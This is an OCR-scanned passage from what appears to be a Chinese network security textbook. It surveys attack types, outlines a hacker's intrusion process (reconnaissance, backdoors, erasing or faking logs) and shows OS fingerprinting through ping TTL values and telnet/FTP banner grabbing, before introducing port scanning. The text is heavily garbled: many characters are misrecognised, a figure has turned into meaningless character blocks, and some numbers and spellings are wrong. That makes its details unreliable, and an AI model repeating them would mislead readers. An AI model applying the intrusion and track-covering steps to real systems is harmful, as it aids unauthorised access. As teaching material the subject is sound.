网 络 攻击 者 在 非法 读 取 数 据 后 ， 下 一 步 通常 就 会 想 去 算 改 它 ， 而 且 这 种 算 改 一 般 可 以 
做 得 让 数据 包 的 发 送 方 和 接收 方 不 知 不 觉 。 但 作为 网 络 通信 用 户 ， 即 使 并 非 所 有 的 通信 数 
据 都 是 高 度 机 密 的 ， 也 不 想 看 到 数据 在 传输 过 程 中 招致 任何 差错 。 比 如 在 网 上 购物 ， 一 且 
我 们 提交 了 购物 订单 ， 谁 也 不 会 希望 订单 中 任何 内 容 被 人 肆意 算 改 。 

3. 身份 欺骗 (IP 地 址 欺骗 ) 


大 多 数 网 络 操作 系统 使 用 他 地 址 来 标识 网 络 主机 。 然 而 ， 在 一 些 情况 下 ， 貌 似 合法 的 
卫 地 址 很 有 可 能 是 经 过 伪装 的 ， 这 就 是 所 谓 他 地 址 欺骗 ， 也 就 是 身份 欺骗 。 另 外 ， 网 络 攻 
击 者 还 可 以 使 用 一 些 特殊 的 程序 ， 对 某 个 从 合法 地 址 传 来 的 数据 包 做 些 手脚 ， 借 此 合法 地 
址 来 非法 侵入 某 个 目标 网 络 。 

4. 基于 口令 攻击 (Password-Based Attacks) 


基于 口令 的 访问 控制 是 一 种 最 常见 的 安全 措施 。 这 意味 着 我 们 对 某 台 主机 或 网 络 资源 
的 访问 权限 决定 于 我 们 是 谁 ， 也 就 是 说 ， 这 种 访问 权 是 基于 我 们 的 用 户 名 和 账号 密码 的 。 

攻击 者 可 以 通过 多 种 途径 获取 用 户 合法 账号 ， 一 旦 他 们 拥有 了 合法 账号 ， 也 就 拥有 了 
与 合法 用 户 同 等 的 网 络 访问 权限 。 因 此 ， 假 设 账 号 被 盗 的 用 户 具 有 网 管 权 限 的 话 ， 攻 击 者 
甚至 可 以 借 机 给 自己 再 创建 一 个 合法 账号 以 备 后 用 。 在 有 了 合法 账号 进入 目标 网 络 后 ， 攻 
击 者 也 就 可 以 随心 所 欲 地 盗 取 合 法 用 户 信息 以 及 网 络 信息 : 修改 服务 器 和 网 络 配置 ， 包 括 
访问 控制 方式 和 路 由 表 ; 算 改 、 重 定向 、 删 除数 据 等 。 

5. 拒绝 服务 攻击 (Denial-of-Service Attack) 


与 盗用 口令 攻击 不 同 ， 拒 绝 服务 攻击 的 目的 不 在 于 窃取 信息 ， 而 是 要 使 某 个 设备 或 网 
络 无 法 正常 运作 。 在 非法 侵入 目标 网 络 后 ， 这 类 攻击 者 惯用 的 攻击 手法 有 以 下 几 种 。 

(1) 首先 设法 转移 网 管 员 的 注意 力 ， 使 之 无 法 立刻 察觉 有 人 人 入侵， 从 而 给 攻击 者 自己 
争取 时 间 。 

(2) 向 某 个 应 用 系统 或 网 络 服务 系统 发 送 非法 指令 ， 至 使 系统 出 现 异 常 行为 或 异常 
终止。 

(3) 向 某 台 主机 或 整个 网 络 发 送 大 量 数据 流 ， 导 致 网 络 因 不 堪 过 载 而 瘫痪 。 

(4) 拦截 数据 流 ， 使 授权 用 户 无 法 取得 网 络 资源 。 

6. 中 间 人 攻击 


中 间 人 攻击 (Man-in-the-Middle Attack， 简 称 “MITM 攻击 ”) 是 一 种 “间接 ”的 入 侵 攻 
击 ， 这 种 攻击 模式 是 通过 各 种 技术 手段 将 受 入 侵 者 控制 的 一 台 计 算 机 虚拟 放置 在 网 络 连接 
中 的 两 台 通信 计算 机 之 间 ， 这 台 计 算 机 就 称 为 “中 间 人 ”。 然 后 入 侵 者 把 这 台 计 算 机 模拟 
一 台 或 两 台 原 始 计算 机 ， 使 “中 间 人 ”能 够 与 原始 计算 机 建立 活动 连接 并 允许 其 读 取 或 算 
改 传递 的 信息 ， 然 而 两 个 原始 计算 机 用 户 却 认为 他 们 是 在 互相 通信 ， 因 而 这 种 攻击 方式 并 
不 很 容易 被 发 现 。 所 以 中 间 人 攻击 很 早 就 成 为 了 黑客 常用 的 一 种 古老 的 攻击 手段 ， 并 且 一 
直到 今天 还 具有 极 大 的 扩展 空间 。 

在 网 络 安全 方面 ，MITM 攻击 的 使 用 是 很 广泛 的 ， 曾 经 猩 狐 一 时 的 SMB 会 话 支持 、 


DNS 欺骗 等 技术 都 是 典型 的 MITM 攻击 手段 。 如 今 , 在 黑客 技术 越 来 越 多 的 运用 于 以 获取 
经 济 利益 为 目标 的 情况 下 时 ，MITM 攻击 成 为 对 网 银 、 网 游 、 网 上 交易 等 最 有 威胁 并 且 最 
具 破 坏 性 的 一 种 攻击 方式 。 

7. 盗 取 密 钥 攻击 (Compromised-Key Attack) 

虽然 一 般 说 来 ， 盗 取 密 钥 是 很 困难 的 ， 但 并 非 不 可 能 。 通 常 我 们 把 被 攻击 者 盗 取 的 密 
钥 称 为 “已 泄密 的 密 钥 ”。 攻 击 者 可 以 利用 这 个 已 泄密 的 密 钥 对 数据 进行 解密 和 修改 ， 甚 
至 还 能 试图 利用 该 密 钥 计算 其 他 密 钥 ， 以 获取 更 多 加 密 信息 。 

8. Sniffer 攻击 (Sniffer Attack) 

Sniffer 指 能 解读 、 监 视 、 拦 截 网 络 数据 交换 以 及 可 以 阅读 数据 包 的 程序 或 设备 。 如 果 
数据 包 没 有 经 过 加 密 ，Sniffer 可 以 将 该 数据 包 中 的 所 有 数据 信息 一 览 无 余 。 即 使 经 过 封装 
的 隧道 数据 包 ，Sniffer 也 可 以 在 对 其 进行 解 封装 后 再 进行 读 取 ， 除 非 该 隧道 数据 经 过 加 密 
而 攻击 者 没有 得 到 解密 所 需要 的 密 钥 。 利 用 Sniffer， 攻 击 者 除了 可 以 读 取 通 信 数 据 外 ， 还 
可 以 对 目标 网 络 进行 分 析 ， 进 一 步 获 取 所 需 资源 ， 甚 至 可 以 导致 目标 网 络 的 崩溃 或 次 痪 。 

9. 应 用 层 攻 击 


应 用 层 攻击 (Application-Layer Attack) 直 接 将 目标 对 准 应 用 系统 服务 器 ， 应 用 层 攻 击 的 
攻击 者 往往 就 是 设计 该 应 用 系统 的 程序 员 。 所 谓 应 用 层 攻 击 是 指 攻 击 者 故意 在 服务 器 操作 
系统 或 应 用 系统 中 制造 一 个 后 门 ， 以 便 可 以 绕 过 正常 的 访问 控制 。 特 洛 伊 木马 就 是 一 个 非 
常 典 型 的 应 用 层 攻 击 程序 ， 攻 击 者 利用 这 个 后 门 ， 可 以 控制 整个 用 户 的 应 用 系统 ， 还 可 以 
实现 以 下 操作 。 

(1) 阅读、 添加、 删除、 修改 用户 数 据 或 操作 系统 。 

(2) 在 用 户 应 用 系统 中 引入 病毒 程序 。 

(3) 引入 Sniffer， 对 用 户 网 络 进行 分 析 ， 以 获取 所 需 信 息 ， 并 导致 用 户 网 络 的 崩溃 或 
瘫痪 。 

(4) 引起 用 户 应 用 系统 的 异常 终止 。 

(5) 解除 用 户 系统 中 的 其 他 安全 控制 ， 为 其 新 一 轮 攻击 打开 方便 之 门 。 


2.2.1 攻击 目的 


网 络 攻击 正 朝 着 具有 更 多 的 商业 动机 发 展 。 随 着 动机 改变 ， 质 量 也 在 改变 。 笔 者 认为 ， 
在 许多 情况 下 ， 网 络 攻击 都 是 专业 软件 开发 人 员 所 为 。 他 们 的 主要 目的 如 下 。 

(1) 窃取 信息 。 

(2) 获取 口令 。 

(3) 控制 中 间 站 点 。 

(4) 获得 超级 用 户 权限 。 


2.2.2 ”攻击 事件 分 类 
在 信息 系统 中 ， 存 在 3 类 安全 威胁 。 
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(1) 外 部 攻击 : 攻击 者 来 自 系统 外 部 。 

(2) 内 部 攻击 : 内 部 越权 行为 。 

(3) 行为 滥用 : 合法 用 户 滥用 特权 。 

实施 外 部 攻击 的 方法 很 多 ， 从 攻击 者 目的 的 角度 来 讲 ， 可 将 攻击 事件 分 为 以 下 5 类 。 
1. 破坏 型 攻击 


拒绝 服务 DogS 攻击 是 破坏 型 攻击 中 最 常见 的 手段 。 主 要 包括 : ping of death、ICMP 


Flood、Teardrop、UDP flood、SYN flood、Land、Smnurf、Fraggle、 畸 形 消息 攻击 、 分 布 式 
拒绝 服务 攻击 ddos、 目 的 地 不 可 到 达 攻 击 、 电 子 邮件 炸弹 、 对 安全 工具 的 拒绝 服务 攻击 等 。 


2. 利用 型 攻击 
利用 型 攻击 是 一 类 试图 直接 对 机 器 进行 控制 的 攻击 ， 最 常见 的 有 3 种 : 口令 猜测 、 特 


洛 伊 木 马 、 绥 冲 区 溢出 。 


3. 信息 收集 型 攻击 
信息 收集 型 攻击 并 不 对 目标 本 身 造 成 危害 ， 这 类 攻击 被 用 来 为 进一步 入 侵 提供 有 用 的 


扫描 技术 包括 : 地 址 扫描 、 端 口 扫 描 、 反 响 映 射 、 慢 速 扫描 、 漏 洞 扫描 。 
体系 结构 探测 即 挖掘 出 被 攻击 主机 的 系统 特征 ， 如 操作 系统 、 系 统 配置 、 应 用 软件 等 。 


以 方便 利用 漏洞 或 其 他 手段 。 


利用 信息 服务 包括 : DNS 域 转换 、Finger 服务 (79 号 端口 )、LDAP(Lightweight Directory 


Access Protocol， 轻 量 目录 访问 协议 )， 它 是 基于 X.500 标准 的 , 一 般 使 用 TCP 的 389 端口 。 


4. 网 络 欺 骗 攻 击 

网 络 欺骗 攻击 包括 : DNS 欺骗 攻击 、 电 子 邮 件 欺骗 、Web 欺骗 ，TP 欺骗。 
5. 垃圾 信息 攻击 

垃圾 信息 攻击 是 以 传播 特定 信息 为 目的 ， 如 广告 信息 等 。 


2.3 攻击 步 又 


黑客 入 侵 攻 击 的 一 般 过程 如 图 2-1 所 示 。 
1. 确定 攻击 的 目标 
入 侵 的 前 提 条 件 是 确定 攻击 目标 ， 而 这 种 确定 往往 都 是 有 某 种 目的 的 。 如 商业 目的 、 


报复 目的 和 练习 等 。 当 然 最 终 的 结果 都 是 为 了 获得 对 目标 主机 的 控制 权 。 


加 


网 络 上 有 许多 主机 , 黑客 首先 要 寻找 他 的 目标 主机 , 当然 真正 能 标识 主机 的 是 瑟 地 址 ， 


黑客 利用 域名 和 IP 地 址 就 可 以 顺利 地 找到 目标 主机 。 


2. 收集 被 攻击 对 象 的 有 关 信 息 
黑客 一 般 会 利用 下 列 的 公开 协议 或 工具 来 收集 相关 信息 。 


由 


(1) SNMP 协议 : 用 来 查阅 网 络 系统 路 由 器 的 路 由 表 ， 从 而 了 解 目标 主机 所 在 网 络 的 
拓扑 结构 及 其 内 部 细节 。 


{一 让 王 1 一 FE 
| 1 利 | | 利 |11 | 测 | |! 
1 1 1 用 | | 用 | | 除 | ， 
1 1 1 | 聊 | | 各 | | 漏 | 1 痕 | 1 
1 | 确 准 | | 种 11 迹 | | 
1 信 1 1 藏 洞 et » 1 
1 | 定 息 备 |1 1 | 自 了 后 | 11 1 
1 攻 的 | 攻 1 1 已 | 段 门 植 1 
1 | 击 击 | 11 登 Dil 入 1 
1 | 目 收 | | 工 |11 | 的 | | 录 效 | 11 后 | 1 
1 的 | | 集 | | 其 | 1 | 你 | | 昌 | | 人 委 [1 | 
' oi | ui | 
1 1 退 | 1 
昌国 加 属国 和 
| EE 省 中 | 
i | 
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(2) TraceRoute 程序 : 能 够 用 该 程序 获得 到 达 目 标 主机 所 要 经 过 的 网 络 数 和 路 由 器 数 。 

(3) Whois 协议 : 该 协议 的 服务 信息 能 提供 所 有 有 关 的 DNS 域 和 相关 的 管理 参数 。 

(4) DNS 服务 器 :该 服务 器 提供 了 系统 中 可 以 访问 的 主机 的 下 地址 表 和 它们 所 对 应 的 
主机 名 。 

(5) Finger 协议 : 用 来 获取 一 个 指定 主机 上 的 所 有 用 户 的 详细 信息 (如 注册 名 、 电 话 号 
码 、 最 后 注册 时 间 以 及 他 们 有 没有 读 邮件 等 )。 

(6) Ping 实用 程序 : 可 以 用 来 确定 一 个 指定 的 主机 的 位 置 。 

(7) 自动 Wardialing 软件 :可 以 向 目标 站 点 一 次 连续 拨 出 大 批 电话 号 码 ， 直 到 遇 到 某 
一 正确 的 号 码 使 调制 解 调 器 响应 为 止 。 

(8) 自 编程 序 : 对 某 些 系统 Intemet 上 已 发 布 了 其 安全 漏洞 所 在 , 但 用 户 由 于 不 懂 或 一 
时 疏 忽 未 及 时 打上 网 上 发 布 的 该 系统 的 “补丁 ”程序 ， 那 么 黑客 就 可 以 自己 编写 一 段 程序 
进入 该 系统 进行 破坏 。 

在 收集 了 信息 之 后 ， 黑 客 就 开始 对 主机 进行 全 面 的 系统 分 析 ， 以 寻求 该 主机 的 安全 漏 
洞 或 安全 弱点 。 

3. 利用 适当 的 扫描 工具 

利用 公开 的 工具 进行 扫描 ， 如 Intemet 的 电子 安全 扫描 程序 ISS(Intemet Security 
Scanner)。 审 计 网 络 用 的 安全 分 析 工 具 SATAN(Secure Analysis Tool for Auditing Network) 
等 。 这 样 的 工具 可 以 对 整个 网 络 或 子 网 进行 扫描 ， 寻 找 安全 漏洞 (注意 ， 这 是 针对 两 台 以 上 
主机 的 局 域 网 情况 )。 

这 些 工具 都 有 两 面 性 。 系 统管 理 员 使 用 它们 以 帮助 发 现 其 管理 的 网 络 系统 内 部 隐藏 的 
安全 漏洞 ， 从 而 确定 系统 中 哪些 主机 需要 用 “补丁 ”程序 去 堵塞 漏洞 ， 而 黑客 也 可 以 利用 
这 些 工具 ， 收 集 目标 系统 的 信息 ， 获 取 攻 击 目标 系统 的 非法 访问 权 。 
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4. 实施 攻击 


黑客 一 旦 获得 了 系统 的 访问 权 后 ， 可 能 会 进行 以 下 操作 。 

(1) 试图 毁 掉 攻 击 入 侵 的 痕迹 ， 并 在 受到 损害 的 系统 上 建立 新 的 安全 漏洞 或 后 门 ， 以 
便 在 先前 的 攻击 点 被 发 现 之 后 ， 继 续 访问 这 个 系统 。 

(2) 在 系统 中 安装 探测 软件 ， 包 括 木马 ， 用 以 掌握 用 户 一 切 活动 ， 以 收集 比较 感 兴 
的 东西 ， 瑞 星 公司 在 近 两 年 的 中 国内 地 互联 网 安全 报告 中 明确 指出 ， 用 户 的 电子 银行 账号 
和 密码 之 类 的 信息 是 黑客 最 感 兴趣 的 。 

G) 如 果 黑 客 攻击 的 主机 是 在 一 个 局 域 网 中 ， 黑 客 就 可 能 会 将 这 台 主 机 作为 对 整个 网 
络 展开 攻击 的 大 本 营 。 

5. 巩固 控制 


当 黑 客 成 功 入 侵 了 一 个 Web 服务 器 之 后 ， 一 般 情况 下 ， 只 有 GUESTS 组 的 权限 ， 而 
他 们 的 最 终 目 的 是 为 了 得 到 整个 服务 器 的 控制 权 ， 这 个 时 候 ， 他 们 就 会 使 用 SA( 一 种 安全 
关联 ， 对 两 台 计算 机 之 间 的 策略 协议 进行 编码 ， 指 定 它们 将 使 用 哪些 算法 和 什么 样 的 密 钥 
长 度 ， 以 及 实际 的 密 钥 本 身 ) 等 手段 提升 自己 的 权限 ， 获 取 控 制 权 。 在 取得 控制 权 以 后 ， 黑 
客 也 不 会 马上 进行 破坏 活动 ， 如 删除 数据 、 涂 改 网 页 等 。 黑 客 为 了 能 长 时 间 的 保留 和 巩固 
他 对 系统 的 控制 权 ， 不 被 管理 员 发 现 ， 他 就 要 清除 入 侵 记录 。 入 侵 记 录 保 存在 日 志 中 ， 黑 
客 当然 不 会 留 下 这 些 “ 犯 罪证 据 ”， 他 会 删除 日 志 或 用 假日 志 神 盖 原 有 内 容 。 

6. 继续 深入 

1) ”安装 后 门 

黑客 入 侵 成 功 后 ， 为 了 方便 下 次 进入 ， 必 须 安装 一 个 不 容易 被 发 现 的 后 门 ， 免 得 下 次 
进入 时 ， 还 需要 经 过 前 面 那些 复杂 的 步 又。 

2) ”修补 漏洞 

黑客 如 果 成 功 入 侵 了 一 台 服 务 器 之 后 要 去 修复 漏洞 ， 原 因 是 这 台 机 器 很 有 可 能 在 未 来 
9 几 天 内 被 其 他 黑客 入 侵 ， 而 其 他 黑客 入 侵 后 ， 如 果 发 现 该 黑客 的 后 门 ， 并 且 将 这 个 大 家 
都 知道 的 漏洞 做 了 手脚 ， 比 如 说 修复 ， 或 者 说 挂 马 ， 那 么 先入 侵 黑客 可 能 就 成 为 受害 者 ， 
因此 他 们 会 修补 漏洞 。 

7. 清除 痕迹 


当 黑 客 入 侵 完 成 后 ， 他 们 会 清理 入 侵 的 痕迹 ， 需 要 清理 的 包括 应 用 程序 日 志 、 安 全 日 
志 、 系 统 日 志 。 关 于 这 点 我 们 将 在 2.5 节 重 点 介绍 。 


2.4 网 络 攻击 的 实施 


无 论 网 络 入 侵 者 攻击 的 是 什么 类 型 的 目标 ， 其 所 采用 的 攻击 手段 和 过 程 都 有 一 定 的 共 
性 。 网 络 攻击 一 般 分 为 如 下 几 个 步骤 。 


1. 调查 、 收 集 和 判断 目标 网 络 系统 的 网 络 结构 等 信息 

入 侵 者 利用 操作 系统 中 现 有 的 网 络 工具 或 协议 ， 收 集 远程 目标 系统 中 各 个 主机 的 相关 
信息 ， 为 对 目标 系统 进行 进一步 分 析 和 判断 做 准备 。 

2. 制定 攻击 策略 和 确定 攻击 目标 

收集 到 远程 目标 的 一 般 网 络 信息 后 确定 攻击 对 象 , 这 与 入 侵 者 所 制定 的 攻击 策略 有 关 。 
一 般 情况 下 ， 入 侵 者 想 要 获得 的 是 1 个 主 系统 或 1 个 可 用 的 最 大 网 段 的 根 访问 权限 ， 通 常 
只 要 成 功 入 侵 1 台 主机 后 ， 就 可 以 控制 整个 网 络 。 

3. 扫描 目标 系统 

入 侵 者 扫描 远程 目标 系统 ， 以 寻找 该 系统 的 安全 漏洞 或 安全 弱点 ， 并 试图 找到 安全 性 
最 薄弱 的 主机 作为 入 侵 对 象 。 因 为 某 些 系统 主机 的 管理 员 素质 不 高 ， 而 造成 的 目标 系统 配 
置 不 当 ， 所 以 这 会 给 入 侵 者 以 机 会 。 而 且 有 时 攻破 1 个 主机 就 意味 着 可 以 攻破 整个 系统 。 

4. 攻击 目标 系统 

入 侵 者 使 用 扫描 方法 探测 到 目标 系统 的 一 些 有 用 信息 并 进行 分 析 ， 寻 找到 目标 系统 由 
于 种 种 原因 而 存在 的 安全 漏洞 后 ， 就 可 以 进行 攻击 并 试图 获得 访问 权限 。 一 旦 获得 访问 权 
限 ， 入 侵 者 就 可 以 搜索 目录 ， 定 位 感 兴趣 的 信息 ， 并 将 信息 传输 、 存 储 起 来 。 通 过 这 人 台 薄 
弱 的 主机 , 入 侵 者 也 可 以 对 与 本 机 建立 了 访问 连接 和 信任 关系 的 其 他 网 络 计算 机 进行 攻击 。 


2.4.1 网 络 信息 搜集 


了 解 操 作 系统 的 目的 是 要 了 解 系统 内 存 的 工作 状态 ， 了 解 它 是 以 什么 方式 、 基 于 什么 
样 的 技术 来 控制 内 存 ， 以 及 是 怎样 来 处 理 输入 与 输出 的 数据 的 。 世 上 任何 东西 都 不 可 能 是 
尽善尽美 的 (当然 这 也 是 我 们 不 断 追 求 的 动力 所 在 )， 复 杂 计 算 机 系统 更 是 如 此 ， 它 在 控制 
内 存 与 处 理 数据 的 过 程 中 总 是 有 可 能 出 错 的 (特别 是 在 安装 了 其 他 的 应 用 程序 以 后 )， 系 统 
本 身 也 会 存在 各 种 各 样 的 弱点 与 不 足 之 处 。 黑 客 之 所 以 能 够 入 侵 ， 就 是 利用 了 这 些 弱点 与 
不 足 。 现 在 网 上 流行 的 各 种 各 样 的 入 侵 工具 ， 都 是 黑客 在 分 析 了 系统 的 弱点 及 存在 的 不 足 
之 后 编写 出 来 的 (其 中 以 “缓冲 区 溢出 ”最 为 常见 )。 

作为 一 般 的 黑客 ， 只 要 善于 使 用 现成 的 入 侵 工 具 ， 就 可 以 达到 入 侵 的 目的 。 但 是 因为 
不 同 的 系统 ， 其 工作 原理 不 一 样 ， 所 以 不 同 的 入 侵 工 具 只 能 针对 相应 的 操作 系统 。 因 此 ， 
对 操作 系统 的 识别 是 必 不 可 少 的 ， 这 就 需要 对 操作 系统 有 相当 的 了 解 ， 并 掌握 一 定 的 网 络 
基础 知识 。 

下 面 是 一 些 简 单 的 操作 系统 识别 方法 。 

1. 用 ping 来 识别 操作 系统 

ping 命令 的 基本 格式 是 : ping hostname。 

其 中 hostname 是 目标 计算 机 的 地 址 。 

例 : ping 192.168.0.1 

下 面 是 具体 的 操作 方法 。 
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Ci:\sping 10,1.1.2 

Pinging 10.1.1.2 with 32 bytes of data: 
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 

Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 

Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 

Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 

Ping statistics for 10.1.1.2: 

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)， 
Approximate round trip times in milli-seconds: 
Minimum = Oms, Maximum = Oms, Average = 0ms 

aN 

CNsping 10-1.5 

Pinging 10.1.1.6 with 32 bytes of data: 

Request timed out. 

Reply from 10.1.1.6: bytes=32 time=250ms TTL=237 
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 

Ping statistics for 10.1.1.6: 

Packets: Sent = 4, Received = 3, Lost = 1 (25% loss)， 
Approximate round trip times in milli-seconds: 


Minimum = 234ms, Maximum = 250ms, Average = 179ms 


根据 ICMP 报 文 的 TTL 的 值 ， 就 可 以 大 概 知道 主机 操作 系统 的 类 型 。 如 : TTL=125 左 
右 的 主机 应 该 是 Windows 系列 的 系统 ，TTL=235 左右 的 主机 应 该 是 UINX 系统 。 如 上 面 的 
两 个 例子 ，10.1.1.2 就 是 Windows 2000 的 系统 ， 而 10.1.1.6 则 是 UINX(Sunos 5.8) 的 系统 。 
这 是 因为 不 同 的 操作 系统 对 ICMP 报 文 的 处 理 与 应 答 是 有 所 不 同 的 ，TTL 值 每 过 一 个 路 由 
器 会 减 1， 所 以 造成 了 TIL 回复 值 的 不 同 。 对 于 TTL 值 与 操作 系统 类 型 的 对 应 ， 还 要 靠 大 
家 平时 多 注意 观察 和 积累 。 

2. 直接 通过 连接 端口 根据 其 返回 的 信息 判断 操作 系统 

这 种 方法 应 该 说 是 用 得 最 多 的 一 种 ， 下 面 来 看 一 个 实例 。 

假如 机 器 开 了 80 端口 ， 就 可 以 用 Telnet 连接 它 。 

Microsoft Windows 2000 [Version 5.00.2195] 

m 版 权 所 有 1985-1998 Microsoft Corp. 


C:\>telnet 10.1.1.2 80 
输入 get 回 车 


如 果 返 回 : 


HTTP/1.1 400 Bad Request 
Server: Microsoft-IIS/5.0 


Date: Fri,; 11 Jal 2003 02:31:55.GMT 
Content-Type: text/html 
Content-Length: 87 

The parameter is incorrect. 
遗失 对 主机 的 连接 。 

【a 

那么 这 台 主 机 就 肯定 是 Windows 的 系统 。 
如 果 返 回 : 


Method Not Implemented 

get to / not 

supported. 

Invalid method in request get 

Apache/1.3.27 Server at gosiuniversity.com Port 80 
遗失 对 主机 的 连接 。 

CN 


那么 多 数 就 是 UINX 的 系统 了 。 

如 果 此 主机 开 了 21 端口， 我们 可 以 直接 使 用 FTP 连接， 如: 

ENREERD ON RE> 

如 果 返 回 : 

Connected to 10.1.1.2. 

220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0). 

User (10.1.1.2none)): 

那么 这 就 肯定 是 一 台 操作 系统 为 Windows 2000 的 主机 了 ， 返 回 的 信息 中 也 包括 主机 
名 ， 在 上 面 的 例子 中 ,主机 名 就 是 sgyyq-c43s950。 这 个 FTP 是 Windows 的 IS 自 带 的 一 个 
FTP 服务 器 。 

如 果 返 回 ， 

Connected to 10.1.1.3- 


220 Serv-U FTP Server v4.0 for WinSock ready... 
User (10.1.1.3none)): 


也 可 以 肯定 它 是 Windows 的 系统 ， 因 为 Serv-U FTP 是 一 个 专 为 Windows 平台 开发 的 
FTP 服务 器 。 
如 果 返 回 : 


Conmnected to 10.1-.1.3- 
220 ready, dude (vsFTPd 1.1.0: beat me, break me) 
User (10.1.1.3none)): 
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那么 这 就 是 一 台 操 作 系统 为 UINX 的 主机 了 。 
如 果 主 机 打开 了 23 端口 ， 可 以 直接 通过 Telnet 连接 。 
如 果 返 回 : 


Microsoft ™ Windows ™ Version 5.00 (Build 2195) 
Welcome to Microsoft Telnet Service 

Telnet Server Build 5.00.99201.1 

login: 

那么 这 肯定 是 一 台 操作 系统 为 Windows 的 主机 了 。 

如 果 返 回 : 


SunoS 5.8 

login: 

那么 这 就 是 一 台 操作 系统 为 UINX 的 主机 了 ， 并 且 版 本 是 SunOS 5.8 的 。 

3. 利用 专门 的 软件 来 识别 

这 种 有 识别 操作 系统 功能 的 软件 ， 多 数 采用 的 是 操作 系统 协议 栈 识别 技术 。 这 是 因为 
不 同 的 厂家 在 编写 自己 的 操作 系统 时 ，TCP/IP 协议 虽然 是 统一 的 ， 但 对 TCP/IP 协议 栈 没 
有 做 统一 的 规定 , 厂家 可 以 按 自己 的 要 求 来 编写 TCP/IP 协议 栈 ， 从 而 造成 了 操作 系统 之 间 
协议 栈 的 不 同 。 因 此 可 以 通过 分 析 协 议 栈 的 不 同 来 区 分 不 同 的 操作 系统 ， 只 要 建立 起 协议 
栈 与 操作 系统 对 应 的 数据 库 ， 就 可 以 准确 的 识别 操作 系统 了 。 目 前 来 说 ， 用 这 种 技术 识别 
操作 系统 是 最 准确 也 是 最 科学 的 。 因 此 也 被 称 为 识别 操作 系统 的 “指纹 技术 ”。 当 然 识 别 
的 能 力 与 准确 性 ， 就 要 看 各 软件 的 数据 库 建立 情况 了 。 

下 面 简单 介绍 两 款 有 识别 功能 的 软件 。 

(1) 著名 的 Nmap, 是 Linux、FreeBSD、UNIX、Windows 下 的 网 络 扫描 和 嗅 探 工具 包 ， 
是 评估 网 络 系统 安全 的 重要 软件 ， 其 基本 功能 是 3 个 : 一 是 探测 一 组 主机 是 否 在 线 ， 二 是 
扫描 主机 端口 ， 嗅 探 所 提供 的 网 络 服务 ; 三 是 推断 主机 所 用 的 操作 系统 。Nmap 可 用 于 扫 
描 仅 有 两 个 结 点 的 LAN, 也 可 以 扫描 500 个 结 点 以 上 的 网 络 。 可 以 深入 探测 UDP 或 者 TCP 
端口 ， 还 可 以 将 所 有 探测 结果 记录 到 各 种 格式 的 日 志 中 ， 供 进一步 分 析 操 作 。 

(2) 天 眼 ， 此 软件 采用 的 是 被 动 式 的 探测 方法 。 

使 用 此 软件 探测 目标 主机 的 系统 时 ， 不 向 目标 系统 发 送 数据 包 ， 只 是 被 动 地 探测 网 络 
上 的 通信 数据 , 通过 分 析 这 些 数据 来 判断 操作 系统 的 类 型 。 配合 superscan 使 用 , 效果 很 好 。 
具体 的 使 用 方法 在 此 就 不 具体 介绍 了 ， 有 兴趣 的 学 生 可 以 到 网 上 搜索 一 下 关于 天 眼 使 用 方 
法 的 文章 。 


2.4.2 ”端口 扫描 


一 个 端口 就 是 一 个 潜在 的 通信 通道 ， 也 就 是 一 个 入 侵 通道 。 对 目标 计算 机 进行 端口 扫 
描 ， 能 得 到 许多 有 用 的 信息 。 进 行 扫描 的 方法 很 多 ， 可 以 是 手工 进行 扫描 ， 也 可 以 用 端口 
扫描 软件 进行 。 


在 手工 进行 扫描 时 ， 需 要 熟悉 各 种 命令 ， 并 对 命令 执行 后 的 输出 进行 分 析 ; 用 扫描 软 
件 进行 扫描 时 ， 许 多 扫描 器 软件 都 有 分 析 数 据 的 功能 。 
通过 端口 扫描 ， 可 以 得 到 许多 有 用 的 信息 ， 从 而 发 现 系 统 的 安全 漏洞 。 


1. 什么 是 扫描 器 


扫描 器 是 一 种 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 ， 使 用 扫描 器 可 以 不 留 痕迹 
地 发 现 远 程 服务 器 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 和 它们 的 软件 版 本 ,这 就 能 让 我 们 
间接 的 或 直观 的 了 解 到 远程 主机 所 存在 的 安全 问题 。 

工作 原理 : 扫描 器 通过 选用 远程 TCP/IP 不 同 的 端口 的 服务 ， 并 记录 目标 给 予 的 回答 
通过 这 种 方法 , 可 以 搜集 到 很 多 关于 目标 主机 的 各 种 有 用 的 信息 (比如 : 是 否 能 用 匿名 登录 、 
是 否 有 可 写 的 FTP 目录、 是 否 能 用 TELNET、HTTPD 是 用 ROOT 还 是 nobady 在 跑 )。 

2. 扫描 器 能 干什么 


扫描 器 并 不 是 一 个 直接 的 攻击 网 络 漏洞 的 程序 ， 它 仅仅 能 帮助 我 们 发 现 目标 机 的 某 些 
内 在 的 弱点 。 一 个 好 的 扫描 器 能 对 它 得 到 的 数据 进行 分 析 ， 帮 助 我 们 查找 目标 主机 的 漏洞 。 
但 它 不 会 提供 进入 一 个 系统 的 详细 步骤 。 

扫描 器 应 该 有 3 项 功能 :发 现 一 个 主机 或 网 络 的 能 力 ; 一 旦 发 现 一 台 主 机 ， 就 会 发 现 
什么 服务 正 运 行 在 这 台 主 机 上 的 能 力 ;， 通过 测试 这 些 服务 ， 发 现 漏洞 的 能 

编写 扫描 器 程序 不 仅 要 有 丰富 的 TCP/IP 程序 编写 和 C、Perl 或 SHELL 语言 编写 的 知 
识 ， 还 需要 一 些 Socket 编程 的 背景 ， 开 发 扫描 器 程序 是 一 项 成 就 感 很 强 的 项 目 ， 它 通常 能 
使 程序 员 感 到 很 满意 。 

3. 常用 的 端口 扫描 技术 


1) ”TCP connect() 扫 描 

这 是 最 基本 的 TCP 扫描 。 操作 系统 提供 的 connect0 系 统 调用 ， 用 来 与 每 一 个 感 兴趣 的 
目标 计算 机 的 端口 进行 连接 。 如 果 端 口 处 于 侦 听 状态 ， 那 么 connect0) 就 能 成 功 。 否 则 ， 这 
个 端口 是 不 能 用 的 ， 即 没有 提供 服务 。 这 个 技术 的 一 个 最 大 的 优点 是 不 需要 任何 权限 ， 系 
统 中 的 任何 用 户 都 有 权利 使 用 这 个 调用 。 该 技术 的 另 一 个 好 处 就 是 速度 快 ， 如 果 对 每 个 目 
